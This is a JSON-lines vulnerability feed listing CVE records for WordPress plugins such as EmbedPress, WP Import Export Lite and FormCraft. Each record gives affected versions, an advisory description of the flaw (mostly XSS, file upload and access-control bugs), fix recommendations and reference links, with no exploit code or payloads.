{"CVE_ID":"CVE-2022-4948","slug":"flying-press ","versionEndExcluding":"3.9.7","description":"The FlyingPress plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 3.9.6. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to interact with the plugin in ways administrators are intended to. One action (save_config) allows for the configuration of an external CDN. This could be used to include malicious javascript from a source controlled by the attacker.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1d541b-7010-4dbf-9b1c-d59c84390065?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1d541b-7010-4dbf-9b1c-d59c84390065?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-flyingpress-plugin-fixed-broken-access-control-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-flyingpress-plugin-fixed-broken-access-control-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23708","slug":"visualizer","versionEndExcluding":"3.9.5","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Themeisle Visualizer: Tables and Charts Manager for WordPress plugin <=\u00a03.9.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/visualizer\\\/wordpress-visualizer-tables-and-charts-manager-for-wordpress-plugin-3-9-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/visualizer\\\/wordpress-visualizer-tables-and-charts-manager-for-wordpress-plugin-3-9-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9652","slug":"locatoraid","versionImpact":"3.9.47","versionEndExcluding":"3.9.48","description":"The Locatoraid Store Locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST keys in all versions up to, and including, 3.9.47 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.9.48, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7821b17a-7da7-434f-8e3f-540e7d7cf6bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7821b17a-7da7-434f-8e3f-540e7d7cf6bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/locatoraid\\\/trunk\\\/happ2\\\/modules\\\/input\\\/lib.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/locatoraid\\\/trunk\\\/happ2\\\/modules\\\/input\\\/lib.php#L705\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167512%40locatoraid&new=3167512%40locatoraid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167512%40locatoraid&new=3167512%40locatoraid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11687","slug":"nextcart-woocommerce-migration","versionImpact":"3.9.2","versionEndExcluding":"3.9.4","description":"The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202036%40nextcart-woocommerce-migration&new=3202036%40nextcart-woocommerce-migration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202036%40nextcart-woocommerce-migration&new=3202036%40nextcart-woocommerce-migration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abcebcdb-e22a-4b6c-86db-f95b00260446?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abcebcdb-e22a-4b6c-86db-f95b00260446?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6624","slug":"json-api-user","versionImpact":"3.9.3","versionEndExcluding":"3.9.4","description":"The JSON API User plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.9.3. This is due to improper controls on custom user meta fields. This makes it possible for unauthenticated attackers to register as administrators on the site. The plugin requires the JSON API plugin to also be installed.","recommendation":"Update to version 3.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4a26f60-5912-4d4a-8ef8-e4357c1fb1ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4a26f60-5912-4d4a-8ef8-e4357c1fb1ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/json-api-user\\\/trunk\\\/controllers\\\/User.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/json-api-user\\\/trunk\\\/controllers\\\/User.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/json-api-user\\\/trunk\\\/controllers\\\/User.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/json-api-user\\\/trunk\\\/controllers\\\/User.php#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115185\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115185\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5061","slug":"wp-import-export-lite","versionImpact":"3.9.29","versionEndExcluding":"3.9.30","description":"The WP Import Export Lite plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpie_parse_upload_data' function in all versions up to, and including, 3.9.29. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an Administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability was partially patched in version 3.9.29.","recommendation":"Update to version 3.9.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/import\\\/class-wpie-upload-validate.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/import\\\/class-wpie-upload-validate.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/import\\\/class-wpie-upload-validate.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/import\\\/class-wpie-upload-validate.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3323402\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3323402\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338701\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338701\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c0f3248-fef6-48a5-b2e1-f2778528fba1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c0f3248-fef6-48a5-b2e1-f2778528fba1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4577","slug":"easy-testimonials","versionEndExcluding":"3.9.3","description":"The Easy Testimonials WordPress plugin before 3.9.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85d9fad7-ba3d-4140-ae05-46262d2643e6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85d9fad7-ba3d-4140-ae05-46262d2643e6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6207","slug":"wp-import-export-lite","versionImpact":"3.9.28","versionEndExcluding":"3.9.29","description":"The WP Import Export Lite plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpie_tempalte_import' function in all versions up to, and including, 3.9.28. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an Administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.9.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/class-wpie-common-action.php#L386\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/class-wpie-common-action.php#L386\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3323402\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3323402\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/188eef67-de66-49c2-aa6c-2cf3b886ff66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/188eef67-de66-49c2-aa6c-2cf3b886ff66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2839","slug":"wp-import-export-lite","versionImpact":"3.9.27","versionEndExcluding":"3.9.28","description":"The WP Import Export Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wpiePreviewData\u2019 function in all versions up to, and including, 3.9.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/assets\\\/js\\\/wpie-export-admin.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/assets\\\/js\\\/wpie-export-admin.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274100\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274100\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ca1ead-1bc5-4ccc-9034-559db27f5e82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ca1ead-1bc5-4ccc-9034-559db27f5e82?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4476","slug":"locatoraid","versionEndExcluding":"3.9.24","description":"The Locatoraid Store Locator WordPress plugin before 3.9.24 does not sanitise and escape the lpr-search parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ca22b22-fe89-42be-94ec-b164838bcf50\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ca22b22-fe89-42be-94ec-b164838bcf50\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5750","slug":"embedpress","versionImpact":"3.9.1","versionEndExcluding":"3.9.2","description":"The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf323f72-8374-40fe-9e2e-810e46de1ec8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf323f72-8374-40fe-9e2e-810e46de1ec8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5749","slug":"embedpress","versionImpact":"3.9.1","versionEndExcluding":"3.9.2","description":"The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3931daac-3899-4169-8625-4c95fd2adafc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3931daac-3899-4169-8625-4c95fd2adafc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2734","slug":"mstore-api","versionEndExcluding":"3.9.2","description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.1. This is due to insufficient verification on the user being supplied during the cart sync from mobile REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/flutter-woo.php#L911\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/flutter-woo.php#L911\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915729%40mstore-api&old=2913397%40mstore-api&sfp_email=&sfph_mail=#file59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915729%40mstore-api&old=2913397%40mstore-api&sfp_email=&sfph_mail=#file59\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5881d16c-84e8-4610-8233-cfa5a94fe3f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5881d16c-84e8-4610-8233-cfa5a94fe3f9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4384","slug":"stream","versionEndExcluding":"3.9.2","description":"The Stream WordPress plugin before 3.9.2 does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b506252-6f37-439e-8984-7316d5cca2e5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b506252-6f37-439e-8984-7316d5cca2e5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4316","slug":"embedpress","versionImpact":"3.9.16","versionEndExcluding":"3.9.17","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 3.9.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/trunk\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Elementor.php#L3076\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/trunk\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Elementor.php#L3076\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2af03168-9344-4db0-9b69-2ad1fdb6d472?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2af03168-9344-4db0-9b69-2ad1fdb6d472?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0477","slug":"auto-post-thumbnail","versionEndExcluding":"3.9.16","description":"The Auto Featured Image (Auto Post Thumbnail) WordPress plugin before 3.9.16 includes an AJAX endpoint that allows any user with at least Author privileges to upload arbitrary files, such as PHP files. This is caused by incorrect file extension validation.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5ef74a2-e04a-4a14-bd0e-d6910cd1c4b4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5ef74a2-e04a-4a14-bd0e-d6910cd1c4b4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1803","slug":"embedpress","versionImpact":"3.9.12","versionEndExcluding":"3.9.13","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to unauthorized access of functionality due to insufficient authorization validation on the PDF embed block in all versions up to, and including, 3.9.12. This makes it possible for authenticated attackers, with contributor-level access and above, to embed PDF blocks.","recommendation":"Update to version 3.9.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175e08ce-aec2-427a-90e0-f955711d58b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175e08ce-aec2-427a-90e0-f955711d58b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055856\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055856\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0817","slug":"formcraft3","versionImpact":"3.9.11","versionEndExcluding":"3.9.12","description":"The FormCraft plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.9.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 3.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/formcraft-premium-wordpress-form-builder\\\/5335056\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/formcraft-premium-wordpress-form-builder\\\/5335056\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/formcraft-wp.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/formcraft-wp.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ae0710a-8c9b-41b0-860f-ae79b7ed1ee4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ae0710a-8c9b-41b0-860f-ae79b7ed1ee4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13783","slug":"formcraft3","versionImpact":"3.9.11","versionEndExcluding":"3.9.12","description":"The FormCraft plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in formcraft-main.php in all versions up to, and including, 3.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export all plugin data which may contain sensitive information from form submissions.","recommendation":"Update to version 3.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/formcraft-premium-wordpress-form-builder\\\/5335056\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/formcraft-premium-wordpress-form-builder\\\/5335056\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/formcraft-wp.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/formcraft-wp.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7b45b1d-7ed6-4382-b69c-45ea45e4d0db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7b45b1d-7ed6-4382-b69c-45ea45e4d0db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1565","slug":"embedpress","versionImpact":"3.9.10","versionEndExcluding":"3.9.11","description":"The EmbedPress \u2013 Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the PDF Widget URL in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/caa97ae8-40a8-4ca1-820b-83675c053bfc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/caa97ae8-40a8-4ca1-820b-83675c053bfc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L705\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037767%40embedpress&new=3037767%40embedpress&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037767%40embedpress&new=3037767%40embedpress&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2128","slug":"embedpress","versionImpact":"3.9.10","versionEndExcluding":"3.9.11","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's embed widget in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6189368d-5925-4c84-9f0f-694b9ebcd45e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6189368d-5925-4c84-9f0f-694b9ebcd45e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.10\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.10\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1802","slug":"embedpress","versionImpact":"3.9.10","versionEndExcluding":"3.9.11","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Wistia embed block in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on the user supplied url. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48511d1a-2fd5-4be4-8409-e99d4aadcdfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48511d1a-2fd5-4be4-8409-e99d4aadcdfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6382","slug":"master-slider","versionImpact":"3.9.9","versionEndExcluding":"3.9.10","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_slide' shortcode in all versions up to, and including, 3.9.9 due to insufficient input sanitization and output escaping on user supplied 'css_class' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d2fc926-6f9f-4ed9-9598-e39b5e6c6544?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d2fc926-6f9f-4ed9-9598-e39b5e6c6544?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3065917%40master-slider&new=3065917%40master-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3065917%40master-slider&new=3065917%40master-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084860%40master-slider&new=3084860%40master-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084860%40master-slider&new=3084860%40master-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
